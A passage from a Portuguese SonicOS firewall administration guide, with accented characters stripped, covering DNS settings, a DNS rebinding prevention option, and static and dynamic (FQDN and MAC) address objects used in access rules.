dispositivo SSL VPN.
Etapa 7 Na lista Servio SSL VPN, selecione o servio ou grupo de servios para os quais voc deseja
permitir clientes autenticados por meio de SSL VPN.
Etapa 8 No ttulo Configuraes do SonicPoint, selecione o Perfil de provisionamento do
SonicPoint desejado para aplicar a todos os SonicPoints conectados a esta zona. Sempre que
um SonicPoint se conectar a esta zona, ele ser provisionado automaticamente pelas
configuraes no Perfil de provisionamento do SonicPoint, a menos que voc o tenha definido
individualmente com configuraes diferentes.
Etapa 9 Selecione Apenas permitir trfego gerado por um SonicPoint para bloquear trfego sem fio
no SonicPoint.
Nota Para obter informaes de configurao de Servios para convidados, consulte Configurar
uma zona para acesso de convidado na pgina 269.
Etapa 10 Clique em OK para aplicar essas configuraes zona de WLAN.

Captulo 16
Definir configuraes de DNS
Rede > DNS

O Domain Name System (DNS) um sistema hierrquico distribudo que fornece um mtodo
para identificar hosts na Internet usando nomes alfanumricos denominados nomes de
domnio totalmente qualificados (FQDNs) em vez de usar endereos IP numricos difceis de
lembrar. A pgina Rede > DNS permite que voc configure manualmente suas configuraes
de DNS, se necessrio.
Na seo Configuraes de DNS, selecione Especificar servidores DNS manualmente e digite

o(s) endereo(s) IP nos campos Servidor DNS. Clique em Aceitar para salvar suas alteraes.
Para usar as configuraes de DNS definidas para a zona de WAN, selecione Herdar
configuraes de DNS dinamicamente da zona de WAN. Clique em Aceitar para salvar suas
alteraes.
Definir configuraes de DNS | 273

DNS e IPv6
O DNS para IPv6 configurado no mesmo mtodo que para o IPv4. Basta clicar na opo IPv6
no boto de opo Exibir verso do IP localizado na parte superior esquerda da pgina Rede
> DNS.
Na seo Configuraes de DNS, selecione Especificar servidores DNS manualmente e
digite o(s) endereo(s) IP nos campos Servidor DNS. Clique em Aceitar para salvar suas
alteraes. Para usar as configuraes de DNS definidas para a zona de WAN, selecione
Herdar configuraes de DNS dinamicamente da zona de WAN. Clique em Aceitar para
salvar suas alteraes
Preveno contra ataque de religao de DNS

A religao de DNS um ataque baseado em DNS no cdigo incorporado em pginas da Web.
Normalmente as solicitaes do cdigo incorporado em pginas da Web (JavaScript, Java e
Flash) so vinculadas ao site da Web no qual tm origem (consulte Poltica de mesma origem).
Um ataque de religao de DNS pode ser usado para melhorar a capacidade de malware
baseado em JavaScript para penetrar em redes privadas e subverter a poltica de mesma
origem do navegador.
Invasores de religao de DNS registram um domnio que delegado a um servidor DNS que
controlam. O servidor est configurado para responder com um parmetro de TTL muito curto,
o que impede que o resultado seja armazenado em cache. A primeira resposta contm o
endereo IP do servidor que hospeda o cdigo mal-intencionado. Quaisquer solicitaes
subsequentes contm endereos IP de rede privada (RFC 1918), presumivelmente atrs de
um firewall, sendo o destino do invasor. Como ambas so respostas DNS totalmente vlidas,
elas autorizam o script em reas restritas para acessar hosts em uma rede privada. Fazendo
a iterao de endereos nestas respostas DNS de curto prazo, mas ainda assim vlidas, o
script capaz de verificar a rede e executar outras atividades mal-intencionadas.
Marque a caixa de seleo Habilitar preveno contra ataque de religao de DNS. No menu
suspenso Ao, selecione uma ao a ser executada quando um ataque de religao de DNS
for detectado:
0 Registrar ataque
1 Registrar ataque e retornar uma reposta recusada de consulta
2 Registrar ataque e descartar resposta de DNS
Objeto/grupo de endereos FQDN de domnios permitidos contendo nomes de domnio
permitidos (como *.sonicwall.com) para os quais sub-redes conectadas/roteadas localmente
devem ser consideradas respostas legais.

Captulo 17
Configurar objetos de endereos
Rede > Objetos de endereos

Os objetos de endereos so uma das quatro classes de objeto (Endereo, Usurio, Servio e
Cronograma) no SonicOS. Esses objetos de endereos permitem a definio de entidades
uma vez e que estas sejam novamente usadas em vrias instncias de referncia na interface
do SonicOS. Por exemplo, considere um servidor Web interno com um endereo IP de
67.115.118.80. Em vez de repetidamente digitar o endereo IP durante a criao de Regras de
acesso ou Polticas de NAT, os objetos de endereos permitem que voc crie uma nica
entidade denominada "Meu servidor Web" como um objeto de endereo de host com um
endereo IP de 67.115.118.80. Este objeto de endereo, "Meu servidor Web", pode ser
selecionado de forma fcil e eficiente a partir de um menu suspenso em qualquer tela de
configurao que utiliza objetos de endereos como um critrio de definio.
Tipos de objetos de endereos

Uma vez que existem vrios tipos de expresses de endereos de rede, existem atualmente
os seguintes tipos de objetos de endereos:
Host os objetos de endereos de host definem um nico host atravs do seu endereo
IP. A mscara de rede de um objeto de endereo de host ser automaticamente definida
para 32 bits (255.255.255.255) para identific-lo como um nico host. Por exemplo, "Meu
servidor Web" com um endereo IP de "67.115.118.110" e uma mscara de rede padro de
"255.255.255.255".
Intervalo os objetos de endereos de intervalo definem um intervalo de endereos IP
contguos. Nenhuma mscara de rede est associada aos objetos de endereos de
intervalo, mas a lgica interna geralmente trata cada membro do intervalo especificado
como um objeto de host mascarado de 32 bits. Por exemplo, "Meus servidores pblicos"
com um endereo IP de valor inicial de "67.115.118.66" e valor final de "67.115.118.90". Os
25 endereos de host individuais nesse intervalo deveriam ser compostos por este objeto
de endereo de intervalo.
Rede os objetos de endereos de rede so como objetos de intervalo por inclurem vrios
hosts, mas em vez de estarem ligados por delimitadores de intervalo superiores e
inferiores especificados, os limites so definidos por uma mscara de rede vlida. Os
objetos de endereos de rede devem ser definidos pelo endereo da rede e uma mscara
de rede correspondente. Por exemplo, "Minha rede pblica" com um valor de rede de
Configurar objetos de endereos | 275

"67.115.118.64" e uma mscara de rede de "255.255.255.224" incluiriam endereos de
67.115.118.64 a 67.115.118.95. Como regra geral, o primeiro endereo em uma rede (o
endereo de rede) e o ltimo endereo em uma rede (o endereo de difuso) so
inutilizveis.
Endereo MAC os objetos de endereo MAC permitem a identificao de um host pelo
seu endereo de hardware ou endereo MAC (Media Access Control Controle de acesso
mdia). Os endereos MAC so atribudos exclusivamente a cada parte do dispositivo de
rede com ou sem fio por seus fabricantes de hardware e devem ser imutveis. Os
endereos MAC so valores de 48 bits expressos em notao hexadecimal de 6 bytes. Por
exemplo, "Meu ponto de acesso" com um endereo MAC de "00:06:01:AB:02:CD". Os
endereos MAC so resolvidos para um endereo IP fazendo referncia ao cache de ARP
no dispositivo de segurana. Os objetos de endereo MAC so usados por vrios
componentes de configuraes sem fio no SonicOS.
Endereo de FQDN os objetos de endereo de FQDN permitem a identificao de um
host pelo seu FQDN (Fully Qualified Domain Name Nome de domnio totalmente
qualificado), como "www.sonicwall.com". Os FQDNs so resolvidos para o seu endereo
IP (ou endereos IP) usando o servidor DNS configurado no dispositivo da segurana. As
entradas de curinga so suportadas por meio da coleta de respostas a consultas enviadas
para os servidores DNS sancionados.
Grupos de objetos de endereos

O SonicOS tem a capacidade de agrupar Objetos de endereos em Grupos de objetos de
endereos. Os grupos de objetos de endereos podem ser definidos para apresentar ainda
mais eficincia referencial. Os grupos podem incluir qualquer combinao de Objetos de
endereos de Host, Intervalo ou Rede. Os objetos de endereos MAC devem ser agrupados
separadamente, embora eles possam ser adicionados com segurana a grupos de objetos de
endereos baseados em IP, nos quais eles sero ignorados quando a sua referncia for
contextualmente irrelevante (por exemplo, em uma Poltica de NAT). Por exemplo, o "Meu
grupo pblico" pode conter o objeto de endereo de host "Meu servidor Web" e o objeto de
endereo de intervalo "Meus servidores pblicos", representando efetivamente os endereos
IP de 67.115.118.66 a 67.115.118.90 e o endereo IP 67.115.118.110.

Criar e gerenciar objetos de endereos
A pgina Rede > Objetos de endereos permite que voc crie e gerencie seus objetos de
endereos.
Voc pode visualizar objetos de endereos das seguintes formas usando o menu Ver estilo:
Todos os objetos de endereos exibe todos os objetos de endereos configurados.
Objetos de endereos personalizados exibe os objetos de endereos com
propriedades personalizadas.
Objetos de endereos padro exibe os objetos de endereos configurados por padro
no firewall.
A classificao de objetos de endereos permite que voc localize de forma fcil e rpida os
objetos de endereos configurados no firewall.
Nota Um objeto de endereo deve ser definido antes de configurar Polticas de NAT, Regras de
acesso e Servios.
Navegar e classificar as entradas de objetos de endereos e de grupos de endereos

As tabelas de objetos de endereos e grupos de endereos fornecem fcil paginao para a
visualizao de um grande nmero de objetos e grupos de endereos. Voc pode navegar em
um grande nmero de entradas listadas nas tabelas de objetos de endereos ou grupos de
endereos usando a barra de controle de navegao localizada na parte superior direita das
tabelas. A barra de controle de navegao inclui quatro botes. O boto mais esquerda exibe
a primeira pgina da tabela. O boto mais direita exibe a ltima pgina. Os botes de seta
interiores para a esquerda e para a direita movem a pgina anterior ou seguinte,
respectivamente.
Voc pode inserir o nmero da poltica (o nmero listado antes do nome da poltica na coluna
# Nome) no campo Itens para avanar para uma entrada especfica. A configurao de tabela
padro exibe 50 entradas por pgina. Voc pode alterar esse nmero padro de entradas de
tabelas na pgina Sistema > Administrao.

Voc pode classificar as entradas na tabela clicando no cabealho da coluna. As entradas so
classificadas por ordem crescente ou decrescente. A seta para a direita da entrada da coluna
indica o status de classificao. Uma seta para baixo significa ordem crescente. Uma seta para
cima indica uma ordem decrescente.
Grupos e objetos de endereos padro

A visualizao Objetos de endereos padro exibe Objetos de endereos e Grupos de
endereos padro para o seu firewall. As entradas Objetos de endereos padro no podem
ser modificadas ou excludas. Portanto, os cones Editar e Excluir so esmaecidos.
Adicionar um objeto de endereo

Para adicionar um Objeto de endereo, clique no boto Adicionar na tabela Objetos de
endereos, nas visualizaes Todos os objetos de endereos ou Objetos de endereos
personalizados para exibir a janela Adicionar objeto de endereo.
Etapa 1 Insira um nome para o objeto de rede no campo Nome.

Etapa 2 Selecione Host, Intervalo, Rede, MAC ou FQDN no menu Tipo.

Se voc selecionar Host, digite o endereo IP e a mscara de rede nos campos
Endereo IP e Mscara de rede.
Se voc tiver selecionado Intervalo, digite os endereos IP inicial e final nos campos
Endereo IP de incio e Endereo IP de trmino.
Se voc tiver selecionado Rede, insira o endereo IP de rede e a mscara de rede nos
campos Rede e Mscara de rede.
Se voc tiver selecionado MAC, insira o endereo MAC e a mscara de rede nos
campos Rede e Endereo MAC.

Se voc tiver selecionado FQDN, digite o nome de domnio para o site individual ou o
intervalo de sites (com um curinga) no campo FQDN.
Etapa 3 Selecione a zona a atribuir ao objeto de endereo no menu Atribuio de zonas.
Editar ou excluir um objeto de endereo

Para editar um objeto de endereo, clique no cone de edio na coluna Configurar na
tabela Objetos de endereos. A janela Editar objeto de endereo exibida, a qual tem as
mesmas configuraes da janela Adicionar objeto de endereo.
Para excluir um Objeto de endereo, clique no cone Excluir na coluna Configurar para o
objeto de endereo que deseja excluir. Uma caixa de dilogo exibida solicitando que voc
confirme a excluso. Clique em OK para excluir o objeto de endereo. Para excluir vrios
objetos de endereos ativos, selecione-os e clique no boto Excluir.
Criar objetos de endereos de grupo

Como so adicionados cada vez mais objetos de endereos ao firewall, voc pode simplificar
o gerenciamento dos endereos e das polticas de acesso com a criao de grupos de
endereos. As alteraes realizadas no grupo so aplicadas a cada endereo no grupo. Para
adicionar um grupo de objetos de endereos, realize as seguintes etapas:
Etapa 1 Clique em Adicionar grupo para exibir a janela Adicionar grupo de objetos de endereo.
Etapa 2 Crie um nome para o grupo no campo Nome.

Etapa 3 Selecione o objeto de endereo da lista e clique na seta para a direita. Ele adicionado ao
grupo. possvel selecionar vrios objetos clicando neles enquanto pressiona a tecla Ctrl.

Dica Para remover um endereo ou uma sub-rede do grupo, selecione o endereo IP ou a sub-
rede na coluna direita e clique na seta para a esquerda. O item selecionado movido da
coluna da direita para a coluna da esquerda.
Editar ou excluir grupos de endereos

Para editar um grupo, clique no cone de edio na coluna Configurar da tabela Grupos
de endereos. A janela Editar grupo de objetos de endereo exibida. Realize suas
alteraes e, em seguida, clique em OK.
Para excluir um grupo, clique no cone Excluir na coluna Configurar para excluir um grupo
de endereos individual. Uma caixa de dilogo exibida solicitando que voc confirme a
excluso. Clique em OK para excluir o grupo de endereos. Para excluir vrios grupos de
endereos ativos, selecione-os e clique no boto Excluir.
Trabalhar com endereos dinmicos

Desde sua criao que o SonicOS tem usado objetos de endereos (AOs) para representar
endereos IP na maioria das reas por toda a interface do usurio. Os objetos de endereos
possuem as seguintes variedades:
Host uma associao individual de endereo IP, mscara de rede e zona.
MAC (original) controle de acesso a mdia ou o endereo de hardware exclusivo de um
host de Ethernet. Os AOs MAC so usados para:
Identificar SonicPoints
Permitir que hosts ignorem a autenticao de servios para convidados
Autorizar o BSSID (Identificador do conjunto de servios ou MAC de WLAN) de pontos
de acesso sem fio detectados durante varreduras sem fio.
Os AOs MAC eram originalmente destinos no permitidos em outras reas da interface
de gerenciamento, como Regras de acesso, por isso no poderiam ser usados
historicamente para controlar o acesso de um host atravs de seu endereo de
hardware.
Intervalo um endereo IP inicial e um final, incluindo todos os endereos intermdios.
Grupo uma coleo de objetos de endereos de qualquer variedade de tipos. Os grupos
podem conter outros objetos de endereos de Grupos, Host, MAC, Intervalo ou FQDN.
O SonicOS redefiniu a operao dos AOs MAC e suporta AOs totalmente de nome de domnio
totalmente qualificado (FQDN):
MAC o SonicOS resolve AOs MAC para um endereo IP fazendo referncia ao cache de
ARP no firewall.
FQDN os nomes de domnio totalmente qualificados, como
"www.reallybadWebsite.com", sero resolvidos para o seu endereo IP (ou endereos IP)
usando o servidor DNS configurado no firewall. As entradas de curinga so suportadas por
meio da coleta de respostas a consultas enviadas para os servidores DNS sancionados.
Embora esteja envolvido mais esforo na criao de um objeto de endereo alm de inserir
simplesmente um endereo IP, os AOs foram implementados para complementar o esquema
de gerenciamento do SonicOS, fornecendo as seguintes caractersticas:

Associao de zona quando definido, os AOs de host, MAC e FQDN exigem uma
designao de zona explcita. Na maioria das reas da interface (por exemplo, Regras de
acesso) isso usado apenas referencialmente. O aplicativo funcional inclui os
preenchimentos contextualmente precisos de listas suspensas do objeto de endereo e a
rea de definies de "Acesso de VPN" atribudas a Usurios e Grupos. Quando os AOs
so usados para definir o Acesso de VPN, o processo de criao automtica de Regra de
acesso se refere zona do AO para determinar a interseo correta de VPN [zona] para
posicionamento de regra. Por outras palavras, se o AO do "Host 192.168.168.200" que
pertence zona de LAN foi adicionado a "Acesso de VPN" do Grupo de usurios "Usurios
confiveis", a Regra de acesso criada automaticamente seria atribuda zona de LAN de
VPN .
Gerenciamento e manipulao a famlia verstil de tipos de objetos de endereos pode
ser facilmente usada em toda a interface do SonicOS, permitindo que as manipulaes
(por exemplo, de Regras de acesso) sejam rapidamente definidas e gerenciadas. A
capacidade de simplesmente adicionar ou remover membros de grupos de objetos de
endereos permite efetivamente modificaes de regras e polticas de referenciamento
sem a necessidade de manipulao direta.
Reutilizao os objetos somente precisam ser definidos uma vez e podem ser
referenciados facilmente quantas vezes for necessrio.

Recursos principais de objetos de endereos dinmicos
O termo de Objeto de endereo dinmico (DAO) descreve a estrutura subjacente permitindo
AOs MAC e FQDN. Transformando AOs de estruturas estticas para dinmicas, a opo
Firewall > Regras de acesso pode responder automaticamente s alteraes na rede.
Recurso Benefcio
Suporte de Os objetos de endereos de FQDN suportam entradas com curingas, tais como
curingas FQDN "*.somedomainname.com", resolvendo primeiro o nome de domnio base para todos os
seus endereos IP de host definidos e, em seguida, coletando ativa e constantemente
respostas de DNS conforme elas passam pelo firewall.
Por exemplo, a criao de um AO FQDN para "*.myspace.com" usar primeiro os
servidores DNS configurados no firewall para resolver "myspace.com" para
63.208.226.40, 63.208.226.41, 63.208.226.42 e 63.208.226.43 (como pode ser
confirmado por nslookup myspace.com ou equivalente). Uma vez que a maioria dos servidores
DNS no permitem transferncias de zonas, normalmente no possvel enumerar
automaticamente todos os hosts em um domnio. Em vez disso, o firewall procurar respostas
de DNS provenientes de servidores DNS sancionados medida que atravessam o firewall. Por
isso, se um host por trs do firewall consultar um servidor DNS externo que tambm um
servidor DNS configurado/definido no firewall, o firewall analisar a resposta para ver se ele
corresponde ao domnio de qualquer AO FQDN com caractere curinga.
Nota: Os servidores DNS sancionados so os servidores DNS configurados para uso pelo
firewall. O motivo da utilizao de respostas de apenas servidores DNS
sancionados no processo de aprendizado de curingas a proteo contra a
possibilidade de envenenamento do AO FQDN atravs do uso de servidores DNS
no sancionados com entradas de host deliberadamente incorretas. Verses
futuras do SonicOS podem oferecer a opo para suportar respostas de todos os
servidores DNS. O uso de servidores DNS sancionados pode ser aplicado com o
uso de Regras de acesso, como descrito posteriormente na seo "Impor o uso de
servidores sancionados na rede".
Por exemplo, suponha que o firewall est configurado para usar servidores DNS 4.2.2.1 e
4.2.2.2 e est fornecendo esses servidores DNS a todos os clientes com firewall por meio de
DHCP. Se o cliente A com firewall realizar uma consulta de DNS relativamente a 4.2.2.1 ou
4.2.2.2 para "vids.myspace.com", a resposta ser examinada pelo firewall e ser feita a
correspondncia ao AO FQDN "*.myspace.com" definido. O resultado (63.208.226.224) ser
ento adicionado aos valores resolvidos do DAO "*.myspace.com".
Nota: Se a estao de trabalho (cliente A) no exemplo acima tivesse resolvido e
armazenado em cache vids.myspace.com antes da criao do AO
"*.myspace.com", vids.myspace.com no seria resolvido pelo firewall porque o
cliente iria usar o cache de seu resolvedor em vez de emitir de uma nova solicitao
de DNS. Como resultado, o firewall no teria a oportunidade de aprender sobre
vids.myspace.com, a menos que o problema fosse resolvido por outro host. Em
uma estao de trabalho com Microsoft Windows, possvel limpar o cache do
resolvedor local usando o comando ipconfig /flushdns. Isso forar o cliente a
resolver todos os FQDNs, permitindo que o firewall faa o aprendizado deles
medida que vo sendo acessados.
As entradas de FQDN com curingas resolvero todos os nomes de host dentro do

contexto do nome de domnio, at 256 entradas por AO. Por exemplo, "*.sonicwall.com"
resolver www.sonicwall.com, software.sonicwall.com, licensemanager.sonicwall.com
para seus respectivos endereos IP, mas ele no resolver sslvpn.demo.sonicwall.com
porque est em um contexto diferente. Para que sslvpn.demo.sonicwall.com seja
resolvido por um AO FQDN com curinga, a entrada "*.demo.sonicwall.com" seria
necessria e tambm iria resolver sonicos-enhanced.demo.sonicwall.com,
csm.demo.sonicwall.com, sonicos-standard.demo.sonicwall.com, etc.
Nota: Os caracteres curinga suportam somente correspondncias completas e no
correspondncias parciais. Por outras palavras, "*.sonicwall.com" uma entrada
legtima, mas "w*.sonicwall.com", "*w.sonicwall.com" e "w*w.sonicwall.com" no
so. Um caractere curinga pode ser especificado somente uma vez por entrada,
portanto "*.*.sonicwall.com", por exemplo, no ser funcional.

Recurso Benefcio
Resoluo de Os objetos de endereos de FQDN so resolvidos usando servidores DNS configurados
FQDN usando no firewall, na pgina Rede > DNS. Como comum as entradas DNS resolverem para
DNS vrios endereos IP, o processo de resoluo de DAO FQDN recuperar todos os
endereos para os quais um nome de host resolve, at 256 entradas por AO. Alm de
resolver o FQDN para seus IPs, o processo de resoluo tambm associar a TTL (vida
til) da entrada como configurado pelo administrador do DNS. A TTL ser ento
respeitada para garantir que as informaes de FQDN no se tornam obsoletas.
Cache de Os valores FQDN resolvidos sero armazenados em cache no caso de falhas de
entrada de FQDN tentativa de resoluo aps a resoluo inicial. Por outras palavras, se
"www.moosifer.com" resolver para 71.35.249.153 com uma TTL de 300, mas falhar ao
resolver aps a expirao de TTL (por exemplo, devido indisponibilidade temporria do
servidor DNS), o 71.35.249.153 ser armazenado em cache e usado como vlido at
que a resoluo seja bem-sucedida ou eliminada manualmente. As entradas FQDN
recm-criadas que nunca so resolvidas com xito ou as entradas que so eliminadas e,
em seguida, falham na resoluo sero exibidas em um estado de no resolvidas.
Resoluo de Quando um n detectado em qualquer um dos segmentos fsicos do firewall atravs do
endereo MAC mecanismo ARP (Protocolo de resoluo de endereo), o cache de ARP do firewall
usando dados atualizado com os endereos MAC e IP desse n. Quando essa atualizao ocorre, se
dinmicos de estiver presente um objeto de endereo MAC referenciando o MAC desse n, ele ser
cache de ARP atualizado instantaneamente com o emparelhamento de endereo resolvido. Quando o
tempo de um n expira do cache de ARP devido a desuso (por exemplo, o host no est
mais conectado com L2 ao firewall), o AO MAC far a transio para um estado "no
resolvido".
Suporte de Os AOs MAC podem ser configurados para suportar ns de mltiplas home pages, em
mltiplas home que mltiplas home pages se referem a ns com mais de um endereo IP por interface
pages do objeto fsica. So permitidas at 256 entradas resolvidas por AO. Dessa forma, se um nico
de endereo endereo MAC for resolvido para vrios IPs, todos os IPs sero aplicveis s regras de
MAC acesso, etc., que se referem ao AO MAC.
Processos de As entradas de AO MAC so sincronizadas automaticamente ao cache de ARP do
atualizao firewall e as entradas de AO FQDN obedecem aos valores de TTL da entrada de DNS,
automtica e garantindo que os valores resolvidos estejam sempre atualizados. Alm desses
manual processos de atualizao automtica, os recursos de Atualizao e Eliminao manuais
so fornecidos para DAOs individuais ou para todos os DAOs definidos.
Resoluo de Os objetos de endereos de FQDN so resolvidos usando servidores DNS configurados
FQDN usando no firewall, na pgina Rede > DNS. Como comum as entradas DNS resolverem para
DNS vrios endereos IP, o processo de resoluo de DAO FQDN recuperar todos os
endereos para os quais um nome de host resolve, at 256 entradas por AO. Alm de
resolver o FQDN para seus IPs, o processo de resoluo tambm associar a TTL (vida
til) da entrada como configurado pelo administrador do DNS. A TTL ser ento
respeitada para garantir que as informaes de FQDN no se tornam obsoletas.
Impor o uso de servidores sancionados na rede

Embora no seja um requisito, recomendvel impor o uso de servidores autorizados ou
sancionados na rede. Esta prtica pode ajudar a reduzir a atividade de rede ilcita e tambm
servir para garantir a confiabilidade do processo de resoluo de curingas de FQDN. Em
geral, uma boa prtica definir os pontos terminais de comunicaes de protocolo conhecidas
quando possvel. Por exemplo:

Criar grupos de objetos de endereo de servidores sancionados (por exemplo, SMTP,
DNS, etc.).
Criar regras de acesso nas zonas relevantes, permitindo que apenas os servidores SMTP
autorizados em sua rede comuniquem SMTP de sada; bloquear todo o outro trfego SMTP
de sada para impedir spam de sada intencional ou no intencional.
Criar regras de acesso nas zonas relevantes, permitindo que os servidores DNS
autorizados na sua rede comuniquem com todos os hosts de destino usando protocolos
DNS (TCP/UDP 53). Certifique-se de que essa regra esteja implementada se voc tiver
servidores DNS em sua rede e se desejar configurar a regra de DNS restritiva que segue.
Criar regras de acesso nas zonas relevantes, permitindo que hosts com firewall
comuniquem somente DNS (TCP/UDP 53) com servidores DNS sancionados; bloquear
todo o outro acesso a DNS para impedir comunicaes com servidores DNS no
autorizados.
As tentativas de acesso no sancionadas sero assim exibidas nos logs.
Usar objetos de endereos dinmicos MAC e FQDN

Os DAOs MAC e FQDN fornecem uma ampla flexibilidade de construo de regras de acesso.
Os AOs MAC e FQDN so configurados da mesma forma que os objetos de endereos
estticos, ou seja, na pgina Rede > Objetos de endereos. Uma vez criados, o status pode
ser visualizado passando o mouse sobre eles e os eventos de log gravaro suas adies e
excluses.
Os objetos de endereos dinmicos so apropriados para muitos aplicativos. A seguir esto

alguns exemplos de como eles podem ser usados. Verses futuras do SonicOS podem
expandir sua versatilidade ainda mais.

Bloquear o acesso a todos os protocolos a um domnio usando DAOs FQDN
Pode haver casos em que voc deseja bloquear o acesso a todos os protocolos a um IP de
destino especfico devido a portas no padro de operaes, uso de protocolo desconhecido
ou obscurecimento intencional de trfego atravs de criptografia, encapsulamento ou ambas
as opes. Um exemplo seria um usurio que configurou um servidor proxy HTTPS (ou outro
mtodo de encaminhamento/encapsulamento de portas em portas "confiveis", como 53, 80,
443, e tambm em portas no padro, como 5734, 23221 e 63466) em sua rede domstica de
modem por cabo ou DSL com o objetivo de obscurecer o trfego atravs do seu
encapsulamento por meio da rede domstica. A falta de previsibilidade de porta geralmente
ainda mais complicada pelo endereamento dinmico dessas redes, tornando o endereo IP
igualmente imprevisvel.
Uma vez que esses cenrios geralmente empregam registros de DNS dinmico (DDNS) para
permitir que os usurios localizem a rede domstica, os AOs FQDN pode ser definidos para
uso agressivo para bloquear o acesso a todos os hosts em um registrador DDNS.
Nota Um destino DDNS usado neste exemplo para ilustrao. Os domnios de destino no
DDNS tambm podem ser usados.
Suposies
O firewall est configurado para usar o servidor DNS 10.50.165.3, 10.50.128.53.
O firewall est fornecendo concesses DHCP para todos os usurios com firewall. Todos
os hosts na rede usam os servidores DNS configurados acima para resoluo.
As comunicaes de DNS para servidores DNS no sancionados podem ser
opcionalmente bloqueadas com regras de acesso, conforme descrito na seo "Impor
o uso de servidores sancionados na rede".
O usurio de DSL domstico est registrando o nome do host moosifer.dyndns.org com o
provedor DDNS DynDNS. Para esta sesso, o ISP atribuiu conexo DSL o endereo
71.35.249.153.
Um AO FQDN com caractere curinga usado para ilustrao porque outros nomes de
host poderiam facilmente ser registrados para o mesmo endereo IP. As entradas de
outros provedores DDNS tambm podem ser adicionadas, conforme necessrio.
Etapa 1 Criar o objeto de endereo de FQDN

Em Rede > Objetos de endereos, selecione Adicionar e crie o objeto de endereo
seguinte:
Quando for criada pela primeira vez, essa entrada resolver apenas para o endereo de
dyndns.org, por exemplo, 63.208.196.110.

Etapa 2 Criar a regra de acesso do firewall
Na pgina Firewall > Regras de acesso, interseo de zona LAN->WAN, adicione uma
regra de acesso da seguinte forma:
Nota Em vez de especificar "Sub-redes LAN" como a origem, uma fonte mais especfica poder
ser especificada, conforme apropriado, para que somente seja negado o acesso de
determinados hosts aos destinos.
Quando um host por trs do firewall tenta resolver moosifer.dyndns.org usando um servidor
DNS sancionado, os endereos IP retornados na resposta da consulta sero adicionados
dinamicamente ao AO FQDN.
Qualquer acesso de protocolo a hosts de destino nesse FQDN ser bloqueado e a tentativa
de acesso ser registrada:
Usar um servidor DNS interno para regras de acesso com base em FQDN
comum para ambientes de rede configurados dinamicamente (DHCP) trabalhar em

combinao com servidores DNS internos para fins de registro dinmico de hosts internos
um exemplo comum inclui os servios DHCP e DNS da Microsoft. Os hosts nessas redes
podem ser configurados facilmente para atualizar dinamicamente os registros DNS em um
servidor DNS devidamente configurado (por exemplo, consulte o artigo da Microsoft
Knowledgebase "How to configure DNS dynamic updates in Windows Server 2003" (Como
configurar atualizaes dinmicas de DNS no Windows Server 2003) em
http://support.microsoft.com/kb/816592/en-us).

A seguir ilustrada uma anlise de pacote de um processo tpico de atualizao dinmica de
DNS, mostrando o host configurado dinamicamente 10.50.165.249 registrando seu nome de
host completo bohuymuth.moosifer.com com o servidor DNS (DHCP fornecido) 10.50.165.3:
Nesses ambientes, poder ser til usar AOs FQDN para controlar o acesso por nome do host.
Isso seria mais aplicvel em redes em que os nomes de host so conhecidos, como onde as
listas de nomes de host so mantidas ou onde uma conveno de nomenclatura previsvel
usada.
Controlar o acesso de rede de um host dinmico por endereo MAC
Como o DHCP muito mais comum do que o endereamento esttico na maioria das redes,
por vezes difcil prever o endereo IP de hosts configurados dinamicamente, especialmente
na ausncia de atualizaes de DNS dinmico ou nomes de host confiveis. Nessas situaes,
possvel usar objetos de endereos MAC para controlar o acesso de um host atravs do seu
endereo MAC (hardware) relativamente imutvel.
Tal como acontece com outros mtodos de controle de acesso, isto pode ser utilizado
inclusivamente, por exemplo, para negar acesso de/para um host especfico ou um grupo de
hosts, ou exclusivamente, onde somente concedido acesso a um host especfico ou grupo
de hosts e negado acesso a todos os outros. Neste exemplo, ilustraremos a ltima situao.
Supondo que voc tinha um conjunto de clientes sem fio habilitados por DHCP executando um
sistema operacional proprietrio que impedia qualquer tipo de autenticao de nvel de usurio
e que voc desejava permitir somente o acesso desses clientes a um servidor especfico de
aplicativo (por exemplo, 10.50.165.2) na sua LAN. O segmento WLAN est usando WPA-PSK
para segurana e esse conjunto de clientes s deve ter acesso ao servidor 10.50.165.2, mas
no a outros recursos da LAN. Todos os outros clientes sem fio no devem ser capazes de
acessar o servidor 10.50.165.2, mas devem ter acesso ilimitado a tudo o resto.

Etapa 1 Criar os objetos de endereos MAC
seguinte (hospedagem mltipla opcional, conforme necessrio):
Uma vez criados, se os hosts estiverem presentes no cache de ARP do firewall, eles sero
resolvidos imediatamente, caso contrrio, eles aparecero em um estado no resolvido na
tabela Objetos de endereos at que sejam ativados e descobertos por meio de ARP:
Crie um grupo de objetos de endereos incluindo os dispositivos portteis:
Etapa 2 Criar as regras de acesso do firewall

Para criar regras de acesso, navegue at a pgina Firewall > Regras de acesso, clique
no boto de opo Todas as regras e role at o final da pgina e clique no boto
Adicionar.
Crie as quatro regras de acesso seguintes:
Configurao Regra de acesso 1 Regra de acesso 2 Regra de acesso 3 Regra de acesso 4

Da zona WLAN WLAN WLAN WLAN
Para a zona LAN LAN LAN LAN
Servio Servios MediaMoose Servios MediaMoose Qualquer Qualquer
Origem Dispositivos portteis Qualquer Dispositivos Qualquer
portteis
Destino 10.50.165.3 10.50.165.3 Qualquer Qualquer

Configurao Regra de acesso 1 Regra de acesso 2 Regra de acesso 3 Regra de acesso 4
Usurios Tudo Tudo Tudo Tudo
permitidos
Cronograma Sempre ativo Sempre ativo Sempre ativo Sempre ativo
Nota O servio "Servios MediaMoose" usado para representar o aplicativo especfico usado
pelos dispositivos portteis. A declarao de um servio especfico opcional, conforme
necessrio.
Acesso de gerenciamento de largura de banda a um domnio inteiro
A mdia de streaming um dos consumidores mais extravagantes de largura de banda de rede.

Mas tentar controlar o acesso ou gerenciar largura de banda distribuda nesses sites difcil
porque a maioria dos sites que servem mdia de streaming tende a faz-lo fora de grandes
farms de servidores. Alm disso, esses sites frequentemente codificam de novo a mdia e
transmitem-na por HTTP, dificultando ainda mais a classificao e o isolamento. O
gerenciamento manual de listas de servidores uma tarefa difcil, mas os objetos de
endereos FQDN com curinga podem ser usados para simplificar esse esforo.
Etapa 1 Criar o objeto de endereo de FQDN

seguinte:
Aps a criao inicial, youtube.com ser resolvido para os endereos IP 208.65.153.240,

208.65.153.241, 208.65.153.242, mas, depois de um host interno comear a resolver hosts
para todos os elementos no domnio youtube.com, as entradas de host aprendidas sero
adicionadas, como a entrada para o servidor v87.youtube.com (208.65.154.84).

Etapa 2 Criar a regra de acesso do firewall
Na pgina Firewall > Regras de acesso, interseo de zona LAN->WAN, adicione uma
regra de acesso da seguinte forma:
Nota Se voc no visualizar a guia Largura de banda, voc pode habilitar o gerenciamento de
